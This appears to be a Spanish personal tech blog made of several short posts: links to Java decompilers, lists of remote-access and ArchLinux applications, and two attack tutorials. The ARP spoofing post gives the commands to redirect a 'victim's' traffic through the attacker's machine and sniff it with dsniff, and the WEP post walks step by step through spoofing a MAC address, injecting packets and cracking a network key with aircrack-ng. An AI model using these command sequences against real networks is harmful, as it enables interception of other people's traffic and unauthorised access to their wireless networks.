Decompiladores JAVA

Enlace original de dos decompiladores Java gratuitos(para Windows):

Cavaj: http://www.bysoft.se/sureshot/cavaj/

JD-GUI: http://java.decompiler.free.fr/

Debido a que recientemente me econtré con la tesitura de decompilar una clase Java, y buscar un decompilador no me resulto fácil, aún conociendo sus nombres. Google me reenviaba a páginas del tipo Softonico y Download.CNET con sus odiosos installers.

Saludos,

Tutorial ARPSpoofing con Dsniff

Primero hacemos que nuestro pc redireccione el trafico, para que la victima no se quede sin internet

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

Y luego hacemos el arpSoofing

#arpspoof -t [gateway IP] [Victim IP] & >/dev/null

#arpspoof -t [victim IP] [gateway IP] & >/dev/null

Y al final vemos el trafico, con wireshark o con…

#dsniff eth0 [eth# is depend your setting, because your sniffing your own box.]

 

Fuentes:

http://www.irongeek.com/i.php?page=security/arpspoof

http://whiskeycola.wordpress.com/2008/05/10/arpspoof-and-dsniff-teach-a-basic-sniffing/

Remote Access Control List

Lista de aplicaciones para control remoto:

Basadas en protocolo VNC(Virtual Network Computing)

  • TightVNC: existe versión para Windows y Linux. Licencia GPL2. Tutoarch. provado y no lo supe hacer funcionar
  • TigerVNC: Despues de instalar TigerVNC en Windows, parar el servicio en modo(Service-mode) y ejecutar el (user-mode), y en Linux ejecutar cliente #vncviewer ip:5900 ha funcionado, pero se cuelga el servidor en Windows al poco rato (es un Windows 7 64 bits) download

O a pelo: ssh with X forwarding

Leer mas en foro

Lista de aplicaciones básicas ArchLinux + XFCE

Lista ArchLinux:

https://wiki.archlinux.org/index.php/Common_Applications

Lista ArchForum Light and Fast(LnF):

2010 -  https://bbs.archlinux.org/viewtopic.php?id=88515

2011 – https://bbs.archlinux.org/viewtopic.php?id=111878

2012 – https://bbs.archlinux.org/viewtopic.php?id=138281

 

Lista de aplicaciones de XFCE:

http://wiki.xfce.org/recommendedapps

ToDo in my ArchLinux

ToDo

 

Ataque básico WEP

Aunque ya casi esta anticuado este tipo de ataque, siguen quedando Wifis con seguridad WEP. Los pasos para conseguir el password de este tipos de puntos de accesos son:

#Ponemos tarjeta en modo promiscuo
$ sudo airmon-ng start wlan0

#Cambiamos MAC de nuestra tarjeta 
$ sudo ifconfig mon0 down
$ sudo macchanger -m 00:11:22:33:44:55 mon0
$ sudo ifconfig mon0 up

#Escaneamos las redes que están a nuestro alcance
$ sudo airodump-ng mon0

#Volcamos el tráfico de red
$ sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0

#Inyectamos tráficos para capturar mas paquetes
$ sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0
$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0

#Ponemos a descifrar la clave con los paquetes capturados
$ sudo aircrack-ng -z [ESSID]*.cap

La información de esta entrada a sido extraida del blog:
http://elblogdepicodev.blogspot.com.es/2012/05/obtener-la-clave-de-una-red-wifi-wep.html
via
http://planeta.archlinux-es.org/
via
https://planet.archlinux.org/